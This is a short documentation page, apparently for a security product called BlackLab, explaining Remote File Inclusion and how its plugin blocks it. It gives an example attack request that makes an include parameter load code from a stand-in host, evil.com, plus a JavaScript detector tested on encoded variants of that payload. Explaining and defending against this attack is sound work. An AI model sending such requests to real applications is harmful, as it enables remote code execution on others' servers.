Remote File Inclusion (RFI) is a vulnerability where an attacker makes your app load and execute a file from a remote server.

## Example attack

```
GET /index.php?page=http://evil.com/malware.txt
```

If not protected, this could execute malicious code from the attacker’s server.

## How BlackLab helps
BlackLab’s RFI plugin blocks requests that try to include remote files, such as:

- URLs starting with `http://` or `https://` in parameters
- Suspicious query values that point outside your app
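
The first check in that list can be sketched as follows. This is an added example, not BlackLab's own code: the function names, the 403/200 decision and the sample requests are assumptions made for illustration. It goes slightly beyond the text by normalising percent-encoding and letter case before matching.

```javascript
// Added illustration, not BlackLab's implementation.
// Flags query parameters whose value begins with a remote http(s) URL.

const REMOTE_SCHEME = /^\s*https?:\/\//i;

// Decode percent-encoding repeatedly (bounded) so that a value encoded
// more than once is normalised before it is inspected.
function normalise(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch {
      break; // malformed escape sequence: inspect what we have so far
    }
    if (decoded === current) break; // nothing left to decode
    current = decoded;
  }
  return current;
}

// Returns the offending parameters for a request target such as
// "/index.php?page=...".
function findRemoteIncludes(requestTarget) {
  // The base is a placeholder, needed only to parse a relative target.
  const url = new URL(requestTarget, "http://localhost");
  const hits = [];
  for (const [name, raw] of url.searchParams) {
    const value = normalise(raw);
    if (REMOTE_SCHEME.test(value)) hits.push({ name, value });
  }
  return hits;
}

// Decision a request filter would make: 403 when any parameter is flagged.
function decide(requestTarget) {
  return findRemoteIncludes(requestTarget).length > 0 ? 403 : 200;
}

// Constructed sample requests.
const samples = [
  "/index.php?page=http://evil.com/malware.txt",
  "/index.php?page=HTTPS%3A%2F%2Fevil.com%2Fmalware.txt",
  "/index.php?page=about",
  "/search?q=how+does+http+work",
];
for (const s of samples) console.log(decide(s), s);
```

A filter like this complements, and does not replace, an allowlist of includable pages in the application itself.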